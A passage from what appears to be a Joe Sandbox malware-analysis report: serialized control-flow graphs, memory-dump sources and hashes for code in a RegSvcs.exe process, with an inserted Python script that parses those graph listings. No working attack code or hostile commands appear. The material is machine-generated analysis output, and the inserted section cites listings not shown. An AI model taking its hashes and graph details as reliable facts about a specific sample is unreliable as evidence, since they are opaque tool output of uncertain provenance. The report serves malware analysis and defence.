6bbc9ed-6bbca12 1296->1299 1300 6bbc8d6-6bbc9e5 call 6bb6608 1296->1300 1299->1289 1300->1296 1351 6bbc9eb 1300->1351 1307 6bbc769-6bbc77f 1301->1307 1308 6bbc74d-6bbc761 1301->1308 1302->1301 1316 6bbc79d-6bbc7b0 1307->1316 1317 6bbc781-6bbc795 1307->1317 1308->1307 1323 6bbc7be 1316->1323 1324 6bbc7b2-6bbc7bc 1316->1324 1317->1316 1325 6bbc7c3-6bbc7c5 1323->1325 1324->1325 1327 6bbc7c7-6bbc7cc 1325->1327 1328 6bbc7f6-6bbc802 1325->1328 1329 6bbc7da 1327->1329 1330 6bbc7ce-6bbc7d8 1327->1330 1328->1280 1328->1281 1332 6bbc7df-6bbc7e1 1329->1332 1330->1332 1332->1328 1333 6bbc7e3-6bbc7ef 1332->1333 1333->1328 1351->1297
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1747a3e9b748c41375891fa9045e62437490e1261f3de581a67076ffa885d2c5
                          • Instruction ID: f4b7a6df0acd2484678b8f053e0c9564daa6210aaf6011d6924ee57243e90fc4
                          • Opcode Fuzzy Hash: 1747a3e9b748c41375891fa9045e62437490e1261f3de581a67076ffa885d2c5
                          • Instruction Fuzzy Hash: 7B329070B002058FDF64DF68D890BBEBBB6EB88310F14A569D506EB391DB75EC418B91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1352 6bb5650-6bb566d 1353 6bb566f-6bb5672 1352->1353 1354 6bb5683-6bb5686 1353->1354 1355 6bb5674-6bb5678 1353->1355 1358 6bb5688-6bb568b 1354->1358 1359 6bb56b0-6bb56b6 1354->1359 1356 6bb5819-6bb5826 1355->1356 1357 6bb567e 1355->1357 1357->1354 1360 6bb568d-6bb5690 1358->1360 1361 6bb5695-6bb5698 1358->1361 1362 6bb56b8 1359->1362 1363 6bb56cc-6bb56d2 1359->1363 1360->1361 1366 6bb56ab-6bb56ae 1361->1366 1367 6bb569a-6bb56a0 1361->1367 1368 6bb56bd-6bb56c0 1362->1368 1364 6bb56d8-6bb56e0 1363->1364 1365 6bb5827-6bb5853 1363->1365 1364->1365 1371 6bb56e6-6bb56f3 1364->1371 1380 6bb585d-6bb5860 1365->1380 1366->1359 1366->1368 1372 6bb578f-6bb5799 1367->1372 1373 6bb56a6 1367->1373 1369 6bb56c2-6bb56c4 1368->1369 1370 6bb56c7-6bb56ca 1368->1370 1369->1370 1370->1363 1374 6bb5702-6bb5705 1370->1374 1371->1365 1376 6bb56f9-6bb56fd 1371->1376 1379 6bb57a0-6bb57a2 1372->1379 1373->1366 1377 6bb571e-6bb5721 1374->1377 1378 6bb5707-6bb5719 1374->1378 1376->1374 1381 6bb5723-6bb5742 1377->1381 1382 6bb5747-6bb574a 1377->1382 1378->1377 1383 6bb57a7-6bb57aa 1379->1383 1386 6bb5878-6bb587b 1380->1386 1387 6bb5862-6bb5873 1380->1387 1381->1382 1384 6bb574c-6bb5762 1382->1384 1385 6bb5767-6bb576a 1382->1385 1389 6bb57ac-6bb57ad 1383->1389 1390 6bb57b2-6bb57b5 1383->1390 1384->1385 1393 6bb5778-6bb577b 1385->1393 1394 6bb576c-6bb5773 1385->1394 1395 6bb588f-6bb5892 1386->1395 1396 6bb587d-6bb5884 1386->1396 1387->1386 1389->1390 1391 6bb57c1-6bb57c4 1390->1391 1392 6bb57b7-6bb57c0 1390->1392 1391->1367 1398 6bb57ca-6bb57cd 1391->1398 1400 6bb578a-6bb578d 1393->1400 1401 6bb577d-6bb5783 1393->1401 1394->1393 1405 6bb58a3-6bb58a6 1395->1405 1406 6bb5894-6bb589e 1395->1406 1403 6bb588a 1396->1403 1404 6bb593e-6bb5945 1396->1404 1409 6bb57cf-6bb57dc 1398->1409 1410 6bb57e1-6bb57e4 1398->1410 1400->1372 1400->1383 1411 6bb57ff-6bb5802 1401->1411 1412 6bb5785 1401->1412 1403->1395 1407 6bb58c8-6bb58cb 1405->1407 1408 6bb58a8-6bb58ac 
1405->1408 1406->1405 1416 6bb58cd-6bb58d1 1407->1416 1417 6bb58e5-6bb58e8 1407->1417 1414 6bb58b2-6bb58ba 1408->1414 1415 6bb5946-6bb5983 1408->1415 1409->1410 1418 6bb57fa-6bb57fd 1410->1418 1419 6bb57e6-6bb57f5 1410->1419 1420 6bb5807-6bb5809 1411->1420 1412->1400 1414->1415 1422 6bb58c0-6bb58c3 1414->1422 1434 6bb5985-6bb5988 1415->1434 1416->1415 1423 6bb58d3-6bb58db 1416->1423 1425 6bb58ea-6bb58f1 1417->1425 1426 6bb58f2-6bb58f5 1417->1426 1418->1411 1418->1420 1419->1418 1427 6bb580b 1420->1427 1428 6bb5810-6bb5813 1420->1428 1422->1407 1423->1415 1429 6bb58dd-6bb58e0 1423->1429 1432 6bb590f-6bb5912 1426->1432 1433 6bb58f7-6bb58fb 1426->1433 1427->1428 1428->1353 1428->1356 1429->1417 1436 6bb592c-6bb592e 1432->1436 1437 6bb5914-6bb5918 1432->1437 1433->1415 1435 6bb58fd-6bb5905 1433->1435 1440 6bb598a-6bb599c 1434->1440 1441 6bb59a3-6bb59a6 1434->1441 1435->1415 1442 6bb5907-6bb590a 1435->1442 1438 6bb5930 1436->1438 1439 6bb5935-6bb5938 1436->1439 1437->1415 1443 6bb591a-6bb5922 1437->1443 1438->1439 1439->1380 1439->1404 1445 6bb59a8-6bb59ba 1440->1445 1453 6bb599e 1440->1453 1441->1445 1446 6bb59c5-6bb59c8 1441->1446 1442->1432 1443->1415 1444 6bb5924-6bb5927 1443->1444 1444->1436 1454 6bb5a49-6bb5a4e 1445->1454 1455 6bb59c0 1445->1455 1447 6bb59ca-6bb59dc 1446->1447 1448 6bb59e3-6bb59e6 1446->1448 1458 6bb5a06-6bb5a19 1447->1458 1461 6bb59de 1447->1461 1451 6bb59e8-6bb59fa 1448->1451 1452 6bb5a01-6bb5a04 1448->1452 1451->1454 1468 6bb59fc 1451->1468 1457 6bb5a1c-6bb5a1f 1452->1457 1452->1458 1453->1441 1462 6bb5a51-6bb5a54 1454->1462 1455->1446 1459 6bb5a21-6bb5a24 1457->1459 1460 6bb5a64-6bb5bd0 1457->1460 1464 6bb5a3f-6bb5a42 1459->1464 1465 6bb5a26-6bb5a38 1459->1465 1501 6bb5bd6-6bb5bdd 1460->1501 1502 6bb5d05-6bb5d18 1460->1502 1461->1448 1466 6bb5a5b-6bb5a5e 1462->1466 1467 6bb5a56-6bb5a58 1462->1467 1464->1460 1470 6bb5a44-6bb5a47 1464->1470 1465->1454 1477 6bb5a3a 1465->1477 1466->1460 1471 6bb5d1b-6bb5d1e 1466->1471 1467->1466 1468->1452 
1470->1454 1470->1462 1474 6bb5d28-6bb5d2a 1471->1474 1475 6bb5d20-6bb5d25 1471->1475 1478 6bb5d2c 1474->1478 1479 6bb5d31-6bb5d34 1474->1479 1475->1474 1477->1464 1478->1479 1479->1434 1480 6bb5d3a-6bb5d43 1479->1480 1503 6bb5be3-6bb5c15 1501->1503 1504 6bb5c90-6bb5c97 1501->1504 1514 6bb5c1a-6bb5c5b 1503->1514 1515 6bb5c17 1503->1515 1504->1502 1505 6bb5c99-6bb5ccc 1504->1505 1517 6bb5cce 1505->1517 1518 6bb5cd1-6bb5cfe 1505->1518 1526 6bb5c5d-6bb5c6e 1514->1526 1527 6bb5c73-6bb5c7a 1514->1527 1515->1514 1517->1518 1518->1480 1526->1480 1528 6bb5c82-6bb5c84 1527->1528 1528->1480
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f78a0cc0db6bc01538f984c551f91425bcafcef2b5a38eace537838e38b86ec5
                          • Instruction ID: e0b4c596bceb459abc1205c6331709da602a3ea7e23e98cb63dcc11c02a1efa7
                          • Opcode Fuzzy Hash: f78a0cc0db6bc01538f984c551f91425bcafcef2b5a38eace537838e38b86ec5
                          • Instruction Fuzzy Hash: 7212D5B2F002049FDB74DF65D8807BEBBA2EB85310F14A4AAD4569B345DBB4EC41CB91
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bee8e713a5eef9985dc492c7f54e2042fa1df6ae043419ddc1f815ce74f3c49c
                          • Instruction ID: 7d814ee7d303399128cd25ee2839b6d973eecfeb3ee6ede22385d8d75b41a5ea
                          • Opcode Fuzzy Hash: bee8e713a5eef9985dc492c7f54e2042fa1df6ae043419ddc1f815ce74f3c49c
                          • Instruction Fuzzy Hash: C6225DB0E002098FEF64CB69D890BFDB7B6EB49310F24A46AE445EB391DA75DC41CB51

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2315 6bb3110-6bb3131 2316 6bb3133-6bb3136 2315->2316 2317 6bb313c-6bb315b 2316->2317 2318 6bb38d7-6bb38da 2316->2318 2328 6bb315d-6bb3160 2317->2328 2329 6bb3174-6bb317e 2317->2329 2319 6bb38dc-6bb38fb 2318->2319 2320 6bb3900-6bb3902 2318->2320 2319->2320 2322 6bb3909-6bb390c 2320->2322 2323 6bb3904 2320->2323 2322->2316 2325 6bb3912-6bb391b 2322->2325 2323->2322 2328->2329 2330 6bb3162-6bb3172 2328->2330 2332 6bb3184-6bb3193 2329->2332 2330->2332 2441 6bb3195 call 6bb3928 2332->2441 2442 6bb3195 call 6bb3930 2332->2442 2334 6bb319a-6bb319f 2335 6bb31ac-6bb3489 2334->2335 2336 6bb31a1-6bb31a7 2334->2336 2357 6bb38c9-6bb38d6 2335->2357 2358 6bb348f-6bb353e 2335->2358 2336->2325 2367 6bb3540-6bb3565 2358->2367 2368 6bb3567 2358->2368 2370 6bb3570-6bb3583 2367->2370 2368->2370 2372 6bb3589-6bb35ab 2370->2372 2373 6bb38b0-6bb38bc 2370->2373 2372->2373 2376 6bb35b1-6bb35bb 2372->2376 2373->2358 2374 6bb38c2 2373->2374 2374->2357 2376->2373 2377 6bb35c1-6bb35cc 2376->2377 2377->2373 2378 6bb35d2-6bb36a8 2377->2378 2390 6bb36aa-6bb36ac 2378->2390 2391 6bb36b6-6bb36e6 2378->2391 2390->2391 2395 6bb36e8-6bb36ea 2391->2395 2396 6bb36f4-6bb3700 2391->2396 2395->2396 2397 6bb3702-6bb3706 2396->2397 2398 6bb3760-6bb3764 2396->2398 2397->2398 2401 6bb3708-6bb3732 2397->2401 2399 6bb376a-6bb37a6 2398->2399 2400 6bb38a1-6bb38aa 2398->2400 2411 6bb37a8-6bb37aa 2399->2411 2412 6bb37b4-6bb37c2 2399->2412 2400->2373 2400->2378 2408 6bb3740-6bb375d 2401->2408 2409 6bb3734-6bb3736 2401->2409 2408->2398 2409->2408 2411->2412 2415 6bb37d9-6bb37e4 2412->2415 2416 6bb37c4-6bb37cf 2412->2416 2420 6bb37fc-6bb380d 2415->2420 2421 6bb37e6-6bb37ec 2415->2421 2416->2415 2419 6bb37d1 2416->2419 2419->2415 2425 6bb380f-6bb3815 2420->2425 2426 6bb3825-6bb3831 2420->2426 2422 6bb37ee 2421->2422 2423 6bb37f0-6bb37f2 2421->2423 2422->2420 2423->2420 2427 6bb3819-6bb381b 2425->2427 2428 6bb3817 2425->2428 2430 6bb3849-6bb389a 2426->2430 2431 6bb3833-6bb3839 
2426->2431 2427->2426 2428->2426 2430->2400 2432 6bb383b 2431->2432 2433 6bb383d-6bb383f 2431->2433 2432->2430 2433->2430 2441->2334 2442->2334
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 24ed31ce81ebbcd724c71daeee1e74ec63eb2ba3b34430b8aa603d62d59eec9b
                          • Instruction ID: e417a6c56cb139d0c9f049cfde3c59b33880957f205996d97ba333f79a1824ae
                          • Opcode Fuzzy Hash: 24ed31ce81ebbcd724c71daeee1e74ec63eb2ba3b34430b8aa603d62d59eec9b
                          • Instruction Fuzzy Hash: 58324070E10719CBDB14EB69C8949EDB7B6FFC9300F10D69AD409AB250EB70AD85CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2443 6bb7de0-6bb7dfe 2444 6bb7e00-6bb7e03 2443->2444 2445 6bb7e05-6bb7e1f 2444->2445 2446 6bb7e24-6bb7e27 2444->2446 2445->2446 2447 6bb7e29-6bb7e37 2446->2447 2448 6bb7e3e-6bb7e41 2446->2448 2458 6bb7e39 2447->2458 2459 6bb7e86-6bb7e9c 2447->2459 2450 6bb7e43-6bb7e5f 2448->2450 2451 6bb7e64-6bb7e67 2448->2451 2450->2451 2453 6bb7e69-6bb7e73 2451->2453 2454 6bb7e74-6bb7e76 2451->2454 2455 6bb7e78 2454->2455 2456 6bb7e7d-6bb7e80 2454->2456 2455->2456 2456->2444 2456->2459 2458->2448 2463 6bb7ea2-6bb7eab 2459->2463 2464 6bb80b7-6bb80c1 2459->2464 2465 6bb80c2-6bb80d4 2463->2465 2466 6bb7eb1-6bb7ece 2463->2466 2469 6bb80e0-6bb80f7 2465->2469 2470 6bb80d6-6bb80de 2465->2470 2475 6bb80a4-6bb80b1 2466->2475 2476 6bb7ed4-6bb7efc 2466->2476 2471 6bb80f9-6bb80fc 2469->2471 2470->2469 2473 6bb811f-6bb8122 2471->2473 2474 6bb80fe-6bb811a 2471->2474 2477 6bb8128-6bb8134 2473->2477 2478 6bb81cf-6bb81d2 2473->2478 2474->2473 2475->2463 2475->2464 2476->2475 2494 6bb7f02-6bb7f0b 2476->2494 2485 6bb813f-6bb8141 2477->2485 2480 6bb81d8-6bb81e7 2478->2480 2481 6bb8407-6bb8409 2478->2481 2492 6bb81e9-6bb8204 2480->2492 2493 6bb8206-6bb824a 2480->2493 2483 6bb840b 2481->2483 2484 6bb8410-6bb8413 2481->2484 2483->2484 2484->2471 2489 6bb8419-6bb8422 2484->2489 2490 6bb8159-6bb815d 2485->2490 2491 6bb8143-6bb8149 2485->2491 2497 6bb816b 2490->2497 2498 6bb815f-6bb8169 2490->2498 2495 6bb814b 2491->2495 2496 6bb814d-6bb814f 2491->2496 2492->2493 2506 6bb83db-6bb83f1 2493->2506 2507 6bb8250-6bb8261 2493->2507 2494->2465 2500 6bb7f11-6bb7f2d 2494->2500 2495->2490 2496->2490 2499 6bb8170-6bb8172 2497->2499 2498->2499 2501 6bb8189-6bb81c2 2499->2501 2502 6bb8174-6bb8177 2499->2502 2510 6bb7f33-6bb7f5d 2500->2510 2511 6bb8092-6bb809e 2500->2511 2501->2480 2527 6bb81c4-6bb81ce 2501->2527 2502->2489 2506->2481 2517 6bb8267-6bb8284 2507->2517 2518 6bb83c6-6bb83d5 2507->2518 2528 6bb8088-6bb808d 2510->2528 2529 6bb7f63-6bb7f8b 2510->2529 2511->2475 
2511->2494 2517->2518 2526 6bb828a-6bb8380 call 6bb6608 2517->2526 2518->2506 2518->2507 2578 6bb838e 2526->2578 2579 6bb8382-6bb838c 2526->2579 2528->2511 2529->2528 2535 6bb7f91-6bb7fbf 2529->2535 2535->2528 2540 6bb7fc5-6bb7fce 2535->2540 2540->2528 2542 6bb7fd4-6bb8006 2540->2542 2550 6bb8008-6bb800c 2542->2550 2551 6bb8011-6bb802d 2542->2551 2550->2528 2553 6bb800e 2550->2553 2551->2511 2552 6bb802f-6bb8086 call 6bb6608 2551->2552 2552->2511 2553->2551 2580 6bb8393-6bb8395 2578->2580 2579->2580 2580->2518 2581 6bb8397-6bb839c 2580->2581 2582 6bb83aa 2581->2582 2583 6bb839e-6bb83a8 2581->2583 2584 6bb83af-6bb83b1 2582->2584 2583->2584 2584->2518 2585 6bb83b3-6bb83bf 2584->2585 2585->2518
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb55eb132e1ed44acfac30bf8af0db4dce56ef7b4ee75a889d542a3d1eaa180e
                          • Instruction ID: ece38e57c1d7f5556202531ac0c68c98e4d57d9ec6b26c214dce022399033bc9
                          • Opcode Fuzzy Hash: bb55eb132e1ed44acfac30bf8af0db4dce56ef7b4ee75a889d542a3d1eaa180e
                          • Instruction Fuzzy Hash: FE02AF70B012058FDB64DB69D490ABEBBFAFF88300F149569D406AB350DB75EC46CB90

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000008.00000002.1471742253.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1490000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22de118733fd8bc9ddbaeeba0a9cf3882f411378998d4ee809bc80046a6c49cf
                          • Instruction ID: f2166603dbba84b0aee680b8fc6e0f4751d67f4e208f087f451a54068b3a1b8f
                          • Opcode Fuzzy Hash: 22de118733fd8bc9ddbaeeba0a9cf3882f411378998d4ee809bc80046a6c49cf
                          • Instruction Fuzzy Hash: 6A412171D043899FDB10DFB9D8007EABFB5AF89210F1985ABD809A7251DB349880CBE1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 24 149ec38-149ec76 25 149ec7e-149ecac GlobalMemoryStatusEx 24->25 26 149ecae-149ecb4 25->26 27 149ecb5-149ecdd 25->27 26->27
                          APIs
                          • GlobalMemoryStatusEx.KERNELBASE ref: 0149EC9F
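The execution_graph listing in the Execution Graph section and the control_flow_graph listings (such as the one directly above, whose block 149ec7e-149ecac carries the GlobalMemoryStatusEx reference at 0149EC9F) are serialized as a flat token stream: a block is written as an id followed by a start address or start-end range, a "call addr" token pair or a bare API name belongs to the block listed just before it, and "id->id" is an edge. The Python script below is an added example, not Joe Sandbox code, that parses that stream into blocks and edges, lists call targets and API references, detects loops, and maps an API reference address back to the block that contains it. The format description is inferred from the listings in this report rather than taken from any documentation, and the embedded inputs are copied from this section: the 17-node execution graph, the four-block graph above, a two-block excerpt carrying a call edge, and the cut-off tail of the section's last control-flow graph, which the parser reports as a dangling id instead of failing.

```python
"""Added example (not Joe Sandbox code): parse the text-serialized control_flow_graph /
execution_graph listings in this report. Token format, inferred from the listings:
<id> <start>[-<end>] = block; call <addr> and <ApiName> = references from the preceding
block; <id>-><id> = edge."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

EDGE = re.compile(r"^(\d+)->(\d+)$")
RANGE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


@dataclass
class Block:
    ident: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # call targets, hex strings
    apis: list = field(default_factory=list)   # API names, e.g. GlobalMemoryStatusEx


@dataclass
class Graph:
    kind: str
    nodes: dict = field(default_factory=dict)     # ident -> Block, in listing order
    edges: list = field(default_factory=list)     # (src, dst) idents
    dangling: list = field(default_factory=list)  # ids with no address: truncated dump


def parse_graph(text):
    tokens = text.split()
    g, cur, i = Graph(tokens[0]), None, 1
    while i < len(tokens):
        tok, m = tokens[i], EDGE.match(tokens[i])
        if m:
            g.edges.append((int(m[1]), int(m[2])))
        elif tok == "call" and cur and i + 1 < len(tokens):
            cur.calls.append(tokens[i + 1])
            i += 1
        elif tok.isdigit():
            # The address after an id may itself be all digits (e.g. 1490848),
            # so an id always takes the next token as its address.
            r = RANGE.match(tokens[i + 1]) if i + 1 < len(tokens) else None
            if r:
                start = int(r[1], 16)
                cur = Block(int(tok), start, int(r[2], 16) if r[2] else start)
                g.nodes[cur.ident] = cur
                i += 1
            else:
                g.dangling.append(int(tok))
        elif cur:
            cur.apis.append(tok)
        i += 1
    return g


def has_loop(g):  # Kahn's algorithm: nodes left unprocessed mean a cycle exists
    indeg, succ = dict.fromkeys(g.nodes, 0), defaultdict(list)
    for a, b in g.edges:
        if a in indeg and b in indeg:  # skip edges into blocks the dump lost
            succ[a].append(b)
            indeg[b] += 1
    ready, seen = [n for n, d in indeg.items() if d == 0], 0
    while ready:
        seen += 1
        for b in succ[ready.pop()]:
            indeg[b] -= 1
            if indeg[b] == 0:
                ready.append(b)
    return seen < len(indeg)


def summarize(g):
    blocks, has_out = list(g.nodes.values()), {a for a, _ in g.edges}
    return {
        "kind": g.kind,
        "entry": blocks[0].start if blocks else None,
        "blocks": len(blocks), "edges": len(g.edges),
        "calls": sorted({c for b in blocks for c in b.calls}),
        "apis": sorted({a for b in blocks for a in b.apis}),
        "exits": sorted(b.start for b in blocks if b.ident not in has_out),
        "has_loop": has_loop(g), "dangling": list(g.dangling),
    }


def block_containing(g, addr):  # map an address (e.g. an API 'ref:') to its block
    return next((b for b in g.nodes.values() if b.start <= addr <= b.end), None)


# Listings copied verbatim from this report section (the last one is its cut-off tail).
EXECUTION_GRAPH = (
    "execution_graph 22925 1490848 22926 149084e 22925->22926 22927 149091b 22926->22927 "
    "22929 149138f 22926->22929 22931 1491393 22929->22931 22930 14914a4 22930->22926 "
    "22931->22930 22933 1497fa0 22931->22933 22934 1497faa 22933->22934 22935 1497fc4 "
    "22934->22935 22938 6bbfa8f 22934->22938 22942 6bbfaa0 22934->22942 22935->22931 "
    "22940 6bbfab5 22938->22940 22939 6bbfcca 22939->22935 22940->22939 22941 6bbfce0 "
    "GlobalMemoryStatusEx 22940->22941 22941->22940 22944 6bbfab5 22942->22944 22943 6bbfcca "
    "22943->22935 22944->22943 22945 6bbfce0 GlobalMemoryStatusEx 22944->22945 22945->22944"
)
CFG_149EC38 = ("control_flow_graph 24 149ec38-149ec76 25 149ec7e-149ecac GlobalMemoryStatusEx "
               "24->25 26 149ecae-149ecb4 25->26 27 149ecb5-149ecdd 25->27 26->27")
CALL_EXCERPT = "control_flow_graph 1281 6bbc6b5-6bbc6be 1285 6bbc6c4-6bbc6f3 call 6bb6608 1281->1285"
TRUNCATED_TAIL = "control_flow_graph 2647 6bbbd29 2648"

if __name__ == "__main__":
    for sample in (EXECUTION_GRAPH, CFG_149EC38, CALL_EXCERPT, TRUNCATED_TAIL):
        s = summarize(parse_graph(sample))
        print({k: (f"{v:#x}" if k == "entry" else v) for k, v in s.items()})
    blk = block_containing(parse_graph(CFG_149EC38), 0x149EC9F)
    print(f"API ref 0149EC9F lies in block {blk.ident} ({blk.start:#x}-{blk.end:#x})")
```

Running it prints one summary per listing. The execution graph parses to 17 blocks, matching the "Total number of Nodes" figure in the Execution Graph section, and contains a cycle: block 6bbfab5 leads to the block at 6bbfce0 that reaches GlobalMemoryStatusEx and the listing has an edge straight back, so the memory query sits inside a loop. The 0149EC9F reference resolves to block 25 of the four-block graph above. The executed versus not-executed colouring of the rendered graphs is not present in the text export, so execution coverage cannot be recovered from these listings.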
                          Memory Dump Source
                          • Source File: 00000008.00000002.1471742253.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1490000_RegSvcs.jbxd
                          Similarity
                          • API ID: GlobalMemoryStatus
                          • String ID:
                          • API String ID: 1890195054-0
                          • Opcode ID: 8108ff44aa0157a516f1e7cce85fc4832d8a7459d9ee23edae940ab160d36801
                          • Instruction ID: 8f90652cb4d46bda130cddb06f469d96c49e391b1247fad25054ddce3bbba6d3
                          • Opcode Fuzzy Hash: 8108ff44aa0157a516f1e7cce85fc4832d8a7459d9ee23edae940ab160d36801
                          • Instruction Fuzzy Hash: D211F0B2C1065A9FDB10CFAAC544BDEFBF4AF48320F15816AD818B7650D378A944CFA5
                          Memory Dump Source
                          • Source File: 00000008.00000002.1478674765.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_6bb0000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4fd03519dfbebcd00c40314a9d71915a720ed6f630f1fc29ae2eb81c3e69db10
                          • Instruction ID: e0d52077b8ce21fea136647e0d895519bfd7639e85c52879cefdee85f2c1c38e
                          • Opcode Fuzzy Hash: 4fd03519dfbebcd00c40314a9d71915a720ed6f630f1fc29ae2eb81c3e69db10
                          • Instruction Fuzzy Hash: B6924874E002048FDB64CF68C584BADBBF2EF49315F54A4A9D4499B361DBB5ED81CB80

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 780 6bbcfb0-6bbcfcb 781 6bbcfcd-6bbcfd0 780->781 782 6bbcfdf-6bbcfe2 781->782 783 6bbcfd2-6bbcfd4 781->783 786 6bbcfec-6bbcfef 782->786 787 6bbcfe4-6bbcfe9 782->787 784 6bbcfda 783->784 785 6bbd357-6bbd360 783->785 784->782 788 6bbd36f-6bbd37b 785->788 789 6bbd362-6bbd367 785->789 790 6bbd038-6bbd03b 786->790 791 6bbcff1-6bbd000 786->791 787->786 792 6bbd48c-6bbd491 788->792 793 6bbd381-6bbd395 788->793 789->788 794 6bbd05e-6bbd061 790->794 795 6bbd03d-6bbd059 790->795 796 6bbd00f-6bbd01b 791->796 797 6bbd002-6bbd007 791->797 812 6bbd499 792->812 811 6bbd39b-6bbd3ad 793->811 793->812 800 6bbd0aa-6bbd0ad 794->800 801 6bbd063-6bbd0a5 794->801 795->794 798 6bbd9cd-6bbda06 796->798 799 6bbd021-6bbd033 796->799 797->796 816 6bbda08-6bbda0b 798->816 799->790 805 6bbd49c-6bbd4a8 800->805 806 6bbd0b3-6bbd0b6 800->806 801->800 809 6bbd2fe-6bbd30d 805->809 810 6bbd4ae-6bbd79b 805->810 813 6bbd0b8-6bbd0fa 806->813 814 6bbd0ff-6bbd102 806->814 819 6bbd30f-6bbd314 809->819 820 6bbd31c-6bbd328 809->820 993 6bbd9c2-6bbd9cc 810->993 994 6bbd7a1-6bbd7a7 810->994 836 6bbd3af-6bbd3b5 811->836 837 6bbd3d1-6bbd3d3 811->837 812->805 813->814 817 6bbd11f-6bbd122 814->817 818 6bbd104-6bbd11a 814->818 822 6bbda3e-6bbda41 816->822 823 6bbda0d-6bbda39 816->823 827 6bbd16b-6bbd16e 817->827 828 6bbd124-6bbd166 817->828 818->817 819->820 820->798 826 6bbd32e-6bbd340 820->826 834 6bbda43-6bbda5f 822->834 835 6bbda64-6bbda67 822->835 823->822 858 6bbd345-6bbd347 826->858 832 6bbd17d-6bbd180 827->832 833 6bbd170-6bbd172 827->833 828->827 841 6bbd1c9-6bbd1cc 832->841 842 6bbd182-6bbd1c4 832->842 833->812 839 6bbd178 833->839 834->835 848 6bbda69 call 6bbdb25 835->848 849 6bbda76-6bbda78 835->849 843 6bbd3b9-6bbd3c5 836->843 844 6bbd3b7 836->844 856 6bbd3dd-6bbd3e9 837->856 839->832 852 6bbd1ce-6bbd210 841->852 853 6bbd215-6bbd218 841->853 842->841 855 6bbd3c7-6bbd3cf 843->855 844->855 870 6bbda6f-6bbda71 848->870 850 6bbda7a 849->850 851 6bbda7f-6bbda82 
849->851 850->851 851->816 859 6bbda84-6bbda93 851->859 852->853 862 6bbd21a-6bbd25c 853->862 863 6bbd261-6bbd264 853->863 855->856 884 6bbd3eb-6bbd3f5 856->884 885 6bbd3f7 856->885 867 6bbd349 858->867 868 6bbd34e-6bbd351 858->868 888 6bbdafa-6bbdb0f 859->888 889 6bbda95-6bbdaf8 call 6bb6608 859->889 862->863 875 6bbd2ad-6bbd2b0 863->875 876 6bbd266-6bbd2a8 863->876 867->868 868->781 868->785 870->849 879 6bbd2f9-6bbd2fc 875->879 880 6bbd2b2-6bbd2f4 875->880 876->875 879->809 879->858 880->879 891 6bbd3fc-6bbd3fe 884->891 885->891 910 6bbdb10 888->910 889->888 891->812 898 6bbd404-6bbd420 call 6bb6608 891->898 924 6bbd42f-6bbd43b 898->924 925 6bbd422-6bbd427 898->925 910->910 924->792 926 6bbd43d-6bbd48a 924->926 925->924 926->812 995 6bbd7a9-6bbd7ae 994->995 996 6bbd7b6-6bbd7bf 994->996 995->996 996->798 997 6bbd7c5-6bbd7d8 996->997 999 6bbd7de-6bbd7e4 997->999 1000 6bbd9b2-6bbd9bc 997->1000 1001 6bbd7f3-6bbd7fc 999->1001 1002 6bbd7e6-6bbd7eb 999->1002 1000->993 1000->994 1001->798 1003 6bbd802-6bbd823 1001->1003 1002->1001 1006 6bbd832-6bbd83b 1003->1006 1007 6bbd825-6bbd82a 1003->1007 1006->798 1008 6bbd841-6bbd85e 1006->1008 1007->1006 1008->1000 1011 6bbd864-6bbd86a 1008->1011 1011->798 1012 6bbd870-6bbd889 1011->1012 1014 6bbd88f-6bbd8b6 1012->1014 1015 6bbd9a5-6bbd9ac 1012->1015 1014->798 1018 6bbd8bc-6bbd8c6 1014->1018 1015->1000 1015->1011 1018->798 